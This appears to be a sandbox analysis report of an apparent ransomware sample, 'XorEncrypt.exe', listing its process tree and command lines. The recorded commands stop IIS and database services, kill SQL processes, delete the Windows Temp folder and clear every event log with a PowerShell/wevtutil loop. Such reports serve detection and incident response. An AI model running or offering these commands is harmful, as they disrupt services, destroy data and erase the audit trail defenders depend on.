PID 2716 wrote to memory of 2568 N/A C:\Users\Admin\AppData\Local\Temp\XorEncrypt.exe C:\Windows\system32\cmd.exe
PID 2716 wrote to memory of 2568 N/A C:\Users\Admin\AppData\Local\Temp\XorEncrypt.exe C:\Windows\system32\cmd.exe
PID 2716 wrote to memory of 2568 N/A C:\Users\Admin\AppData\Local\Temp\XorEncrypt.exe C:\Windows\system32\cmd.exe
PID 2568 wrote to memory of 2844 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\net.exe
PID 2568 wrote to memory of 2844 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\net.exe
PID 2568 wrote to memory of 2844 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\net.exe
PID 2844 wrote to memory of 2720 N/A C:\Windows\system32\net.exe C:\Windows\system32\net1.exe
PID 2844 wrote to memory of 2720 N/A C:\Windows\system32\net.exe C:\Windows\system32\net1.exe
PID 2844 wrote to memory of 2720 N/A C:\Windows\system32\net.exe C:\Windows\system32\net1.exe
PID 2716 wrote to memory of 2712 N/A C:\Users\Admin\AppData\Local\Temp\XorEncrypt.exe C:\Windows\system32\cmd.exe
PID 2716 wrote to memory of 2712 N/A C:\Users\Admin\AppData\Local\Temp\XorEncrypt.exe C:\Windows\system32\cmd.exe
PID 2716 wrote to memory of 2712 N/A C:\Users\Admin\AppData\Local\Temp\XorEncrypt.exe C:\Windows\system32\cmd.exe
PID 2712 wrote to memory of 2112 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\net.exe
PID 2712 wrote to memory of 2112 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\net.exe
PID 2712 wrote to memory of 2112 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\net.exe
PID 2112 wrote to memory of 2192 N/A C:\Windows\system32\net.exe C:\Windows\system32\net1.exe
PID 2112 wrote to memory of 2192 N/A C:\Windows\system32\net.exe C:\Windows\system32\net1.exe
PID 2112 wrote to memory of 2192 N/A C:\Windows\system32\net.exe C:\Windows\system32\net1.exe
PID 2716 wrote to memory of 2672 N/A C:\Users\Admin\AppData\Local\Temp\XorEncrypt.exe C:\Windows\system32\cmd.exe

Processes

C:\Users\Admin\AppData\Local\Temp\XorEncrypt.exe

"C:\Users\Admin\AppData\Local\Temp\XorEncrypt.exe"

C:\Windows\system32\cmd.exe

cmd /C "reg add HKEY_CLASSES_ROOT\.0xcf41769d063c9\DefaultIcon /t REG_SZ /d %SystemRoot%\System32\SHELL32.dll,47 /f"

C:\Windows\system32\reg.exe

reg add HKEY_CLASSES_ROOT\.0xcf41769d063c9\DefaultIcon /t REG_SZ /d C:\Windows\System32\SHELL32.dll,47 /f

C:\Windows\system32\cmd.exe

cmd /C "iisreset /stop"

C:\Windows\system32\cmd.exe

cmd /C "NET STOP IISADMIN"

C:\Windows\system32\net.exe

NET STOP IISADMIN

C:\Windows\system32\net1.exe

C:\Windows\system32\net1 STOP IISADMIN

C:\Windows\system32\cmd.exe

cmd /C "net stop WAS"

C:\Windows\system32\net.exe

net stop WAS

C:\Windows\system32\net1.exe

C:\Windows\system32\net1 stop WAS

C:\Windows\system32\cmd.exe

cmd /C "NET stop MSSQLSERVER"

C:\Windows\system32\net.exe

NET stop MSSQLSERVER

C:\Windows\system32\net1.exe

C:\Windows\system32\net1 stop MSSQLSERVER

C:\Windows\system32\cmd.exe

cmd /C "NET stop \"SQL Server (MSSQLSERVER)\""

C:\Windows\system32\net.exe

NET stop \"SQL Server (MSSQLSERVER)\"

C:\Windows\system32\net1.exe

C:\Windows\system32\net1 stop \"SQL Server (MSSQLSERVER)\"

C:\Windows\system32\cmd.exe

cmd /C "net stop MSSQL$SQLEXPRESS"

C:\Windows\system32\net.exe

net stop MSSQL$SQLEXPRESS

C:\Windows\system32\net1.exe

C:\Windows\system32\net1 stop MSSQL$SQLEXPRESS

C:\Windows\system32\cmd.exe

cmd /C "net stop SQLSERVERAGENT"

C:\Windows\system32\net.exe

net stop SQLSERVERAGENT

C:\Windows\system32\net1.exe

C:\Windows\system32\net1 stop SQLSERVERAGENT

C:\Windows\system32\cmd.exe

cmd /C "net stop mysql"

C:\Windows\system32\net.exe

net stop mysql

C:\Windows\system32\net1.exe

C:\Windows\system32\net1 stop mysql

C:\Windows\system32\cmd.exe

cmd /C "taskkill /F /IM sqlservr.exe /T"

C:\Windows\system32\taskkill.exe

taskkill /F /IM sqlservr.exe /T

C:\Windows\system32\cmd.exe

cmd /C "taskkill /F /IM sqlceip.exe /T"

C:\Windows\system32\taskkill.exe

taskkill /F /IM sqlceip.exe /T

C:\Windows\system32\cmd.exe

cmd /C "taskkill /F /IM sqlwriter.exe /T"

C:\Windows\system32\taskkill.exe

taskkill /F /IM sqlwriter.exe /T

C:\Windows\system32\cmd.exe

cmd /C "Del /S /F /Q %Windir%\Temp"

C:\Windows\system32\cmd.exe

cmd /C C:\Users\Public\Log.cmd

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell "wevtutil el | Foreach-Object {wevtutil cl "$_"}"

C:\Windows\system32\wevtutil.exe

"C:\Windows\system32\wevtutil.exe" el

C:\Windows\system32\wevtutil.exe

"C:\Windows\system32\wevtutil.exe" cl Analytic

C:\Windows\system32\wevtutil.exe

"C:\Windows\system32\wevtutil.exe" cl Application

C:\Windows\system32\wevtutil.exe

"C:\Windows\system32\wevtutil.exe" cl DebugChannel

C:\Windows\system32\wevtutil.exe

"C:\Windows\system32\wevtutil.exe" cl DirectShowFilterGraph

C:\Windows\system32\wevtutil.exe

"C:\Windows\system32\wevtutil.exe" cl DirectShowPluginControl

C:\Windows\system32\wevtutil.exe

"C:\Windows\system32\wevtutil.exe" cl Els_Hyphenation/Analytic

C:\Windows\system32\wevtutil.exe

"C:\Windows\system32\wevtutil.exe" cl EndpointMapper

C:\Windows\system32\wevtutil.exe

"C:\Windows\system32\wevtutil.exe" cl ForwardedEvents

C:\Windows\system32\wevtutil.exe

"C:\Windows\system32\wevtutil.exe" cl HardwareEvents

C:\Windows\system32\wevtutil.exe

"C:\Windows\system32\wevtutil.exe" cl "Internet Explorer"

C:\Windows\system32\wevtutil.exe

"C:\Windows\system32\wevtutil.exe" cl "Key Management Service"

C:\Windows\system32\wevtutil.exe

"C:\Windows\system32\wevtutil.exe" cl MF_MediaFoundationDeviceProxy

C:\Windows\system32\wevtutil.exe

"C:\Windows\system32\wevtutil.exe" cl "Media Center"

C:\Windows\system32\wevtutil.exe

"C:\Windows\system32\wevtutil.exe" cl MediaFoundationDeviceProxy

C:\Windows\system32\wevtutil.exe

"C:\Windows\system32\wevtutil.exe" cl MediaFoundationPerformance

C:\Windows\system32\wevtutil.exe

"C:\Windows\system32\wevtutil.exe" cl MediaFoundationPipeline

C:\Windows\system32\wevtutil.exe

"C:\Windows\system32\wevtutil.exe" cl MediaFoundationPlatform

C:\Windows\system32\wevtutil.exe

"C:\Windows\system32\wevtutil.exe" cl Microsoft-IE/Diagnostic

C:\Windows\system32\wevtutil.exe

"C:\Windows\system32\wevtutil.exe" cl Microsoft-IEDVTOOL/Diagnostic

C:\Windows\system32\wevtutil.exe

"C:\Windows\system32\wevtutil.exe" cl Microsoft-IEFRAME/Diagnostic

C:\Windows\system32\wevtutil.exe

"C:\Windows\system32\wevtutil.exe" cl Microsoft-JSDumpHeap/Diagnostic

C:\Windows\system32\wevtutil.exe

"C:\Windows\system32\wevtutil.exe" cl Microsoft-PerfTrack-IEFRAME/Diagnostic

C:\Windows\system32\wevtutil.exe

"C:\Windows\system32\wevtutil.exe" cl Microsoft-PerfTrack-MSHTML/Diagnostic

C:\Windows\system32\wevtutil.exe

"C:\Windows\system32\wevtutil.exe" cl Microsoft-Windows-ADSI/Debug

C:\Windows\system32\wevtutil.exe

"C:\Windows\system32\wevtutil.exe" cl Microsoft-Windows-API-Tracing/Operational

C:\Windows\system32\wevtutil.exe

"C:\Windows\system32\wevtutil.exe" cl Microsoft-Windows-ATAPort/General

C:\Windows\system32\wevtutil.exe

"C:\Windows\system32\wevtutil.exe" cl Microsoft-Windows-ATAPort/SATA-LPM

C:\Windows\system32\wevtutil.exe

"C:\Windows\system32\wevtutil.exe" cl Microsoft-Windows-ActionQueue/Analytic

C:\Windows\system32\wevtutil.exe

"C:\Windows\system32\wevtutil.exe" cl Microsoft-Windows-AltTab/Diagnostic

C:\Windows\system32\wevtutil.exe

"C:\Windows\system32\wevtutil.exe" cl Microsoft-Windows-AppID/Operational

C:\Windows\system32\wevtutil.exe

"C:\Windows\system32\wevtutil.exe" cl "Microsoft-Windows-AppLocker/EXE and DLL"

C:\Windows\system32\wevtutil.exe

"C:\Windows\system32\wevtutil.exe" cl "Microsoft-Windows-AppLocker/MSI and Script"

C:\Windows\system32\wevtutil.exe

"C:\Windows\system32\wevtutil.exe" cl "Microsoft-Windows-Application Server-Applications/Admin"

C:\Windows\system32\wevtutil.exe

"C:\Windows\system32\wevtutil.exe" cl "Microsoft-Windows-Application Server-Applications/Analytic"

C:\Windows\system32\wevtutil.exe

"C:\Windows\system32\wevtutil.exe" cl "Microsoft-Windows-Application Server-Applications/Debug"

C:\Windows\system32\wevtutil.exe

"C:\Windows\system32\wevtutil.exe" cl "Microsoft-Windows-Application Server-Applications/Operational"

C:\Windows\system32\wevtutil.exe

"C:\Windows\system32\wevtutil.exe" cl Microsoft-Windows-Application-Experience/Problem-Steps-Recorder

C:\Windows\system32\wevtutil.exe

"C:\Windows\system32\wevtutil.exe" cl Microsoft-Windows-Application-Experience/Program-Compatibility-Assistant

C:\Windows\system32\wevtutil.exe

"C:\Windows\system32\wevtutil.exe" cl Microsoft-Windows-Application-Experience/Program-Compatibility-Troubleshooter

C:\Windows\system32\wevtutil.exe

"C:\Windows\system32\wevtutil.exe" cl Microsoft-Windows-Application-Experience/Program-Inventory

C:\Windows\system32\wevtutil.exe

"C:\Windows\system32\wevtutil.exe" cl Microsoft-Windows-Application-Experience/Program-Inventory/Debug

C:\Windows\system32\wevtutil.exe

"C:\Windows\system32\wevtutil.exe" cl Microsoft-Windows-Application-Experience/Program-Telemetry

C:\Windows\system32\wevtutil.exe

"C:\Windows\system32\wevtutil.exe" cl Microsoft-Windows-Audio/CaptureMonitor

C:\Windows\system32\wevtutil.exe

"C:\Windows\system32\wevtutil.exe" cl Microsoft-Windows-Audio/Operational

C:\Windows\system32\wevtutil.exe

"C:\Windows\system32\wevtutil.exe" cl Microsoft-Windows-Audio/Performance

C:\Windows\system32\wevtutil.exe

"C:\Windows\system32\wevtutil.exe" cl Microsoft-Windows-Audit/Analytic

C:\Windows\system32\wevtutil.exe

"C:\Windows\system32\wevtutil.exe" cl "Microsoft-Windows-Authentication User Interface/Operational"

C:\Windows\system32\wevtutil.exe

"C:\Windows\system32\wevtutil.exe" cl Microsoft-Windows-AxInstallService/Log

C:\Windows\system32\wevtutil.exe

"C:\Windows\system32\wevtutil.exe" cl Microsoft-Windows-Backup

C:\Windows\system32\wevtutil.exe

"C:\Windows\system32\wevtutil.exe" cl Microsoft-Windows-Biometrics/Operational

C:\Windows\system32\wevtutil.exe

"C:\Windows\system32\wevtutil.exe" cl Microsoft-Windows-BitLocker-DrivePreparationTool/Admin

C:\Windows\system32\wevtutil.exe

"C:\Windows\system32\wevtutil.exe" cl Microsoft-Windows-BitLocker-DrivePreparationTool/Operational

C:\Windows\system32\wevtutil.exe

"C:\Windows\system32\wevtutil.exe" cl Microsoft-Windows-Bits-Client/Analytic

C:\Windows\system32\wevtutil.exe

"C:\Windows\system32\wevtutil.exe" cl Microsoft-Windows-Bits-Client/Operational

C:\Windows\system32\wevtutil.exe

"C:\Windows\system32\wevtutil.exe" cl Microsoft-Windows-Bluetooth-MTPEnum/Operational

C:\Windows\system32\wevtutil.exe

"C:\Windows\system32\wevtutil.exe" cl Microsoft-Windows-BranchCache/Operational

C:\Windows\system32\wevtutil.exe

"C:\Windows\system32\wevtutil.exe" cl Microsoft-Windows-BranchCacheClientEventProvider/Diagnostic

C:\Windows\system32\wevtutil.exe

"C:\Windows\system32\wevtutil.exe" cl Microsoft-Windows-BranchCacheEventProvider/Diagnostic

C:\Windows\system32\wevtutil.exe

"C:\Windows\system32\wevtutil.exe" cl Microsoft-Windows-BranchCacheSMB/Analytic

C:\Windows\system32\wevtutil.exe

"C:\Windows\system32\wevtutil.exe" cl Microsoft-Windows-BranchCacheSMB/Operational

C:\Windows\system32\wevtutil.exe

"C:\Windows\system32\wevtutil.exe" cl Microsoft-Windows-CAPI2/Operational

C:\Windows\system32\wevtutil.exe

"C:\Windows\system32\wevtutil.exe" cl Microsoft-Windows-CDROM/Operational

C:\Windows\system32\wevtutil.exe

"C:\Windows\system32\wevtutil.exe" cl Microsoft-Windows-COM/Analytic

C:\Windows\system32\wevtutil.exe

"C:\Windows\system32\wevtutil.exe" cl Microsoft-Windows-COMRuntime/Tracing

C:\Windows\system32\wevtutil.exe

"C:\Windows\system32\wevtutil.exe" cl Microsoft-Windows-Calculator/Debug

C:\Windows\system32\wevtutil.exe

"C:\Windows\system32\wevtutil.exe" cl Microsoft-Windows-Calculator/Diagnostic

C:\Windows\system32\wevtutil.exe

"C:\Windows\system32\wevtutil.exe" cl Microsoft-Windows-CertPoleEng/Operational

C:\Windows\system32\wevtutil.exe

"C:\Windows\system32\wevtutil.exe" cl Microsoft-Windows-CertificateServicesClient-CredentialRoaming/Operational

C:\Windows\system32\wevtutil.exe

"C:\Windows\system32\wevtutil.exe" cl Microsoft-Windows-ClearTypeTextTuner/Diagnostic

C:\Windows\system32\wevtutil.exe

"C:\Windows\system32\wevtutil.exe" cl Microsoft-Windows-CmiSetup/Analytic

C:\Windows\system32\wevtutil.exe

"C:\Windows\system32\wevtutil.exe" cl Microsoft-Windows-CodeIntegrity/Operational

C:\Windows\system32\wevtutil.exe

"C:\Windows\system32\wevtutil.exe" cl Microsoft-Windows-CodeIntegrity/Verbose

C:\Windows\system32\wevtutil.exe

"C:\Windows\system32\wevtutil.exe" cl Microsoft-Windows-ComDlg32/Analytic

C:\Windows\system32\wevtutil.exe

"C:\Windows\system32\wevtutil.exe" cl Microsoft-Windows-ComDlg32/Debug

C:\Windows\system32\wevtutil.exe

"C:\Windows\system32\wevtutil.exe" cl Microsoft-Windows-CorruptedFileRecovery-Client/Operational

C:\Windows\system32\wevtutil.exe

"C:\Windows\system32\wevtutil.exe" cl Microsoft-Windows-CorruptedFileRecovery-Server/Operational

C:\Windows\system32\wevtutil.exe

"C:\Windows\system32\wevtutil.exe" cl Microsoft-Windows-CredUI/Diagnostic

C:\Windows\system32\wevtutil.exe

"C:\Windows\system32\wevtutil.exe" cl Microsoft-Windows-Crypto-RNG/Analytic

C:\Windows\system32\wevtutil.exe

"C:\Windows\system32\wevtutil.exe" cl Microsoft-Windows-D3D10Level9/Analytic

C:\Windows\system32\wevtutil.exe

"C:\Windows\system32\wevtutil.exe" cl Microsoft-Windows-D3D10Level9/PerfTiming

C:\Windows\system32\wevtutil.exe

"C:\Windows\system32\wevtutil.exe" cl Microsoft-Windows-DCLocator/Debug

C:\Windows\system32\wevtutil.exe

"C:\Windows\system32\wevtutil.exe" cl Microsoft-Windows-DNS-Client/Operational

C:\Windows\system32\wevtutil.exe

"C:\Windows\system32\wevtutil.exe" cl Microsoft-Windows-DUI/Diagnostic

C:\Windows\system32\wevtutil.exe

"C:\Windows\system32\wevtutil.exe" cl Microsoft-Windows-DUSER/Diagnostic

C:\Windows\system32\wevtutil.exe

"C:\Windows\system32\wevtutil.exe" cl Microsoft-Windows-DXGI/Analytic

C:\Windows\system32\wevtutil.exe

"C:\Windows\system32\wevtutil.exe" cl Microsoft-Windows-DXGI/Logging

C:\Windows\system32\wevtutil.exe

"C:\Windows\system32\wevtutil.exe" cl Microsoft-Windows-DXP/Analytic

C:\Windows\system32\wevtutil.exe

"C:\Windows\system32\wevtutil.exe" cl Microsoft-Windows-DateTimeControlPanel/Analytic

C:\Windows\system32\wevtutil.exe

"C:\Windows\system32\wevtutil.exe" cl Microsoft-Windows-DateTimeControlPanel/Debug

C:\Windows\system32\wevtutil.exe

"C:\Windows\system32\wevtutil.exe" cl Microsoft-Windows-DateTimeControlPanel/Operational

C:\Windows\system32\wevtutil.exe

"C:\Windows\system32\wevtutil.exe" cl Microsoft-Windows-Deplorch/Analytic

C:\Windows\system32\wevtutil.exe

"C:\Windows\system32\wevtutil.exe" cl Microsoft-Windows-DeviceSync/Analytic

C:\Windows\system32\wevtutil.exe

"C:\Windows\system32\wevtutil.exe" cl Microsoft-Windows-DeviceSync/Operational

C:\Windows\system32\wevtutil.exe

"C:\Windows\system32\wevtutil.exe" cl Microsoft-Windows-DeviceUx/Informational

C:\Windows\system32\wevtutil.exe

"C:\Windows\system32\wevtutil.exe" cl Microsoft-Windows-DeviceUx/Performance

C:\Windows\system32\wevtutil.exe

"C:\Windows\system32\wevtutil.exe" cl Microsoft-Windows-Dhcp-Client/Admin

C:\Windows\system32\wevtutil.exe

"C:\Windows\system32\wevtutil.exe" cl Microsoft-Windows-Dhcp-Client/Operational

C:\Windows\system32\wevtutil.exe

"C:\Windows\system32\wevtutil.exe" cl Microsoft-Windows-DhcpNap/Admin

C:\Windows\system32\wevtutil.exe

"C:\Windows\system32\wevtutil.exe" cl Microsoft-Windows-DhcpNap/Operational

C:\Windows\system32\wevtutil.exe

"C:\Windows\system32\wevtutil.exe" cl Microsoft-Windows-Dhcpv6-Client/Admin

C:\Windows\system32\wevtutil.exe

"C:\Windows\system32\wevtutil.exe" cl Microsoft-Windows-Dhcpv6-Client/Operational

C:\Windows\system32\wevtutil.exe

"C:\Windows\system32\wevtutil.exe" cl Microsoft-Windows-DiagCpl/Debug

C:\Windows\system32\wevtutil.exe

"C:\Windows\system32\wevtutil.exe" cl Microsoft-Windows-Diagnosis-DPS/Analytic

C:\Windows\system32\wevtutil.exe

"C:\Windows\system32\wevtutil.exe" cl Microsoft-Windows-Diagnosis-DPS/Debug

C:\Windows\system32\wevtutil.exe

"C:\Windows\system32\wevtutil.exe" cl Microsoft-Windows-Diagnosis-DPS/Operational

C:\Windows\system32\wevtutil.exe

"C:\Windows\system32\wevtutil.exe" cl Microsoft-Windows-Diagnosis-MSDE/Debug

C:\Windows\system32\wevtutil.exe

"C:\Windows\system32\wevtutil.exe" cl Microsoft-Windows-Diagnosis-PCW/Analytic

C:\Windows\system32\wevtutil.exe

"C:\Windows\system32\wevtutil.exe" cl Microsoft-Windows-Diagnosis-PCW/Debug

C:\Windows\system32\wevtutil.exe

"C:\Windows\system32\wevtutil.exe" cl Microsoft-Windows-Diagnosis-PCW/Operational

C:\Windows\system32\wevtutil.exe

"C:\Windows\system32\wevtutil.exe" cl Microsoft-Windows-Diagnosis-PLA/Debug

C:\Windows\system32\wevtutil.exe

"C:\Windows\system32\wevtutil.exe" cl Microsoft-Windows-Diagnosis-PLA/Operational

C:\Windows\system32\wevtutil.exe

"C:\Windows\system32\wevtutil.exe" cl Microsoft-Windows-Diagnosis-Perfhost/Analytic

C:\Windows\system32\wevtutil.exe

"C:\Windows\system32\wevtutil.exe" cl Microsoft-Windows-Diagnosis-Scheduled/Operational

C:\Windows\system32\wevtutil.exe

"C:\Windows\system32\wevtutil.exe" cl Microsoft-Windows-Diagnosis-Scripted/Admin

C:\Windows\system32\wevtutil.exe

"C:\Windows\system32\wevtutil.exe" cl Microsoft-Windows-Diagnosis-Scripted/Analytic

C:\Windows\system32\wevtutil.exe

"C:\Windows\system32\wevtutil.exe" cl Microsoft-Windows-Diagnosis-Scripted/Debug

C:\Windows\system32\wevtutil.exe

"C:\Windows\system32\wevtutil.exe" cl Microsoft-Windows-Diagnosis-Scripted/Operational

C:\Windows\system32\wevtutil.exe

"C:\Windows\system32\wevtutil.exe" cl Microsoft-Windows-Diagnosis-ScriptedDiagnosticsProvider/Debug

C:\Windows\system32\wevtutil.exe

"C:\Windows\system32\wevtutil.exe" cl Microsoft-Windows-Diagnosis-ScriptedDiagnosticsProvider/Operational

C:\Windows\system32\wevtutil.exe

"C:\Windows\system32\wevtutil.exe" cl Microsoft-Windows-Diagnosis-TaskManager/Debug

C:\Windows\system32\wevtutil.exe

"C:\Windows\system32\wevtutil.exe" cl Microsoft-Windows-Diagnosis-WDC/Analytic

C:\Windows\system32\wevtutil.exe

"C:\Windows\system32\wevtutil.exe" cl Microsoft-Windows-Diagnosis-WDI/Debug

C:\Windows\system32\wevtutil.exe

"C:\Windows\system32\wevtutil.exe" cl Microsoft-Windows-Diagnostics-Networking/Debug

C:\Windows\system32\wevtutil.exe

"C:\Windows\system32\wevtutil.exe" cl Microsoft-Windows-Diagnostics-Networking/Operational

C:\Windows\system32\wevtutil.exe

"C:\Windows\system32\wevtutil.exe" cl Microsoft-Windows-Diagnostics-PerfTrack-Counters/Diagnostic

C:\Windows\system32\wevtutil.exe

"C:\Windows\system32\wevtutil.exe" cl Microsoft-Windows-Diagnostics-PerfTrack/Diagnostic

C:\Windows\system32\wevtutil.exe

"C:\Windows\system32\wevtutil.exe" cl Microsoft-Windows-Diagnostics-Performance/Diagnostic

C:\Windows\system32\wevtutil.exe

"C:\Windows\system32\wevtutil.exe" cl Microsoft-Windows-Diagnostics-Performance/Diagnostic/Loopback

C:\Windows\system32\wevtutil.exe

"C:\Windows\system32\wevtutil.exe" cl Microsoft-Windows-Diagnostics-Performance/Operational

C:\Windows\system32\wevtutil.exe

"C:\Windows\system32\wevtutil.exe" cl Microsoft-Windows-Direct3D10/Analytic

C:\Windows\system32\wevtutil.exe

"C:\Windows\system32\wevtutil.exe" cl Microsoft-Windows-Direct3D10_1/Analytic

C:\Windows\system32\wevtutil.exe

"C:\Windows\system32\wevtutil.exe" cl Microsoft-Windows-Direct3D11/Analytic

C:\Windows\system32\wevtutil.exe

"C:\Windows\system32\wevtutil.exe" cl Microsoft-Windows-Direct3D11/Logging

C:\Windows\system32\wevtutil.exe

"C:\Windows\system32\wevtutil.exe" cl Microsoft-Windows-Direct3D11/PerfTiming

C:\Windows\system32\wevtutil.exe

"C:\Windows\system32\wevtutil.exe" cl Microsoft-Windows-DirectShow-KernelSupport/Performance

C:\Windows\system32\wevtutil.exe

"C:\Windows\system32\wevtutil.exe" cl Microsoft-Windows-DirectSound/Debug

C:\Windows\system32\wevtutil.exe

"C:\Windows\system32\wevtutil.exe" cl Microsoft-Windows-DirectWrite-FontCache/Tracing

C:\Windows\system32\wevtutil.exe

"C:\Windows\system32\wevtutil.exe" cl Microsoft-Windows-DirectWrite/Tracing

C:\Windows\system32\wevtutil.exe

"C:\Windows\system32\wevtutil.exe" cl Microsoft-Windows-Disk/Operational

C:\Windows\system32\wevtutil.exe

"C:\Windows\system32\wevtutil.exe" cl Microsoft-Windows-DiskDiagnostic/Operational

C:\Windows\system32\wevtutil.exe

"C:\Windows\system32\wevtutil.exe" cl Microsoft-Windows-DiskDiagnosticDataCollector/Operational

C:\Windows\system32\wevtutil.exe

"C:\Windows\system32\wevtutil.exe" cl Microsoft-Windows-DiskDiagnosticResolver/Operational

C:\Windows\system32\wevtutil.exe

"C:\Windows\system32\wevtutil.exe" cl Microsoft-Windows-DisplayColorCalibration/Debug

C:\Windows\system32\wevtutil.exe

"C:\Windows\system32\wevtutil.exe" cl Microsoft-Windows-DisplayColorCalibration/Operational

C:\Windows\system32\wevtutil.exe

"C:\Windows\system32\wevtutil.exe" cl Microsoft-Windows-DisplaySwitch/Diagnostic

C:\Windows\system32\wevtutil.exe

"C:\Windows\system32\wevtutil.exe" cl Microsoft-Windows-Documents/Performance

C:\Windows\system32\wevtutil.exe

"C:\Windows\system32\wevtutil.exe" cl Microsoft-Windows-DriverFrameworks-UserMode/Operational

C:\Windows\system32\wevtutil.exe

"C:\Windows\system32\wevtutil.exe" cl Microsoft-Windows-DxgKrnl/Diagnostic

C:\Windows\system32\wevtutil.exe

"C:\Windows\system32\wevtutil.exe" cl Microsoft-Windows-DxgKrnl/Performance

C:\Windows\system32\wevtutil.exe

"C:\Windows\system32\wevtutil.exe" cl Microsoft-Windows-DxpTaskRingtone/Analytic

C:\Windows\system32\wevtutil.exe

"C:\Windows\system32\wevtutil.exe" cl Microsoft-Windows-DxpTaskSyncProvider/Analytic

C:\Windows\system32\wevtutil.exe

"C:\Windows\system32\wevtutil.exe" cl Microsoft-Windows-EFS/Debug

C:\Windows\system32\wevtutil.exe

"C:\Windows\system32\wevtutil.exe" cl Microsoft-Windows-EapHost/Analytic

C:\Windows\system32\wevtutil.exe

"C:\Windows\system32\wevtutil.exe" cl Microsoft-Windows-EapHost/Debug

C:\Windows\system32\wevtutil.exe

"C:\Windows\system32\wevtutil.exe" cl Microsoft-Windows-EapHost/Operational

C:\Windows\system32\wevtutil.exe

"C:\Windows\system32\wevtutil.exe" cl Microsoft-Windows-EaseOfAccess/Diagnostic

C:\Windows\system32\wevtutil.exe

"C:\Windows\system32\wevtutil.exe" cl Microsoft-Windows-EventCollector/Debug

C:\Windows\system32\wevtutil.exe

"C:\Windows\system32\wevtutil.exe" cl Microsoft-Windows-EventCollector/Operational

C:\Windows\system32\wevtutil.exe

"C:\Windows\system32\wevtutil.exe" cl Microsoft-Windows-EventLog-WMIProvider/Debug

C:\Windows\system32\wevtutil.exe

"C:\Windows\system32\wevtutil.exe" cl Microsoft-Windows-EventLog/Analytic

C:\Windows\system32\wevtutil.exe

"C:\Windows\system32\wevtutil.exe" cl Microsoft-Windows-EventLog/Debug

C:\Windows\system32\wevtutil.exe

"C:\Windows\system32\wevtutil.exe" cl Microsoft-Windows-FMS/Analytic

C:\Windows\system32\wevtutil.exe

"C:\Windows\system32\wevtutil.exe" cl Microsoft-Windows-FMS/Debug

C:\Windows\system32\wevtutil.exe

"C:\Windows\system32\wevtutil.exe" cl Microsoft-Windows-FMS/Operational

C:\Windows\system32\wevtutil.exe

"C:\Windows\system32\wevtutil.exe" cl Microsoft-Windows-FailoverClustering-Client/Diagnostic

C:\Windows\system32\wevtutil.exe

"C:\Windows\system32\wevtutil.exe" cl Microsoft-Windows-Fault-Tolerant-Heap/Operational

C:\Windows\system32\wevtutil.exe

"C:\Windows\system32\wevtutil.exe" cl Microsoft-Windows-Feedback-Service-TriggerProvider

C:\Windows\system32\wevtutil.exe

"C:\Windows\system32\wevtutil.exe" cl Microsoft-Windows-FileInfoMinifilter/Operational

C:\Windows\system32\wevtutil.exe

"C:\Windows\system32\wevtutil.exe" cl Microsoft-Windows-Firewall-CPL/Diagnostic

C:\Windows\system32\wevtutil.exe

"C:\Windows\system32\wevtutil.exe" cl "Microsoft-Windows-Folder Redirection/Operational"

C:\Windows\system32\wevtutil.exe

"C:\Windows\system32\wevtutil.exe" cl Microsoft-Windows-Forwarding/Debug

C:\Windows\system32\wevtutil.exe

"C:\Windows\system32\wevtutil.exe" cl Microsoft-Windows-Forwarding/Operational

C:\Windows\system32\wevtutil.exe

"C:\Windows\system32\wevtutil.exe" cl Microsoft-Windows-GettingStarted/Diagnostic

C:\Windows\system32\wevtutil.exe

"C:\Windows\system32\wevtutil.exe" cl Microsoft-Windows-GroupPolicy/Operational

C:\Windows\system32\wevtutil.exe

"C:\Windows\system32\wevtutil.exe" cl Microsoft-Windows-HAL/Debug

C:\Windows\system32\wevtutil.exe

"C:\Windows\system32\wevtutil.exe" cl Microsoft-Windows-HealthCenter/Debug

C:\Windows\system32\wevtutil.exe

"C:\Windows\system32\wevtutil.exe" cl Microsoft-Windows-HealthCenter/Performance

C:\Windows\system32\wevtutil.exe

"C:\Windows\system32\wevtutil.exe" cl Microsoft-Windows-HealthCenterCPL/Performance

C:\Windows\system32\wevtutil.exe

"C:\Windows\system32\wevtutil.exe" cl Microsoft-Windows-Help/Operational

C:\Windows\system32\wevtutil.exe

"C:\Windows\system32\wevtutil.exe" cl "Microsoft-Windows-HomeGroup Control Panel Performance/Diagnostic"

C:\Windows\system32\wevtutil.exe

"C:\Windows\system32\wevtutil.exe" cl "Microsoft-Windows-HomeGroup Control Panel/Operational"

C:\Windows\system32\wevtutil.exe

"C:\Windows\system32\wevtutil.exe" cl "Microsoft-Windows-HomeGroup Listener Service/Operational"

C:\Windows\system32\wevtutil.exe

"C:\Windows\system32\wevtutil.exe" cl "Microsoft-Windows-HomeGroup Provider Service Performance/Diagnostic"

C:\Windows\system32\wevtutil.exe

"C:\Windows\system32\wevtutil.exe" cl "Microsoft-Windows-HomeGroup Provider Service/Operational"

C:\Windows\system32\wevtutil.exe

"C:\Windows\system32\wevtutil.exe" cl Microsoft-Windows-HomeGroup-ListenerService

C:\Windows\system32\wevtutil.exe

"C:\Windows\system32\wevtutil.exe" cl Microsoft-Windows-HotStart/Diagnostic

C:\Windows\system32\wevtutil.exe

"C:\Windows\system32\wevtutil.exe" cl Microsoft-Windows-HttpService/Trace

C:\Windows\system32\wevtutil.exe

"C:\Windows\system32\wevtutil.exe" cl Microsoft-Windows-IKE/Operational

C:\Windows\system32\wevtutil.exe

"C:\Windows\system32\wevtutil.exe" cl Microsoft-Windows-IKEDBG/Debug

C:\Windows\system32\wevtutil.exe

"C:\Windows\system32\wevtutil.exe" cl Microsoft-Windows-IPBusEnum/Tracing

C:\Windows\system32\wevtutil.exe

"C:\Windows\system32\wevtutil.exe" cl Microsoft-Windows-IPSEC-SRV/Diagnostic

C:\Windows\system32\wevtutil.exe

"C:\Windows\system32\wevtutil.exe" cl Microsoft-Windows-International-RegionalOptionsControlPanel/Operational

C:\Windows\system32\wevtutil.exe

"C:\Windows\system32\wevtutil.exe" cl Microsoft-Windows-International/Operational

C:\Windows\system32\wevtutil.exe

"C:\Windows\system32\wevtutil.exe" cl Microsoft-Windows-Iphlpsvc/Debug

C:\Windows\system32\wevtutil.exe

"C:\Windows\system32\wevtutil.exe" cl Microsoft-Windows-Iphlpsvc/Operational

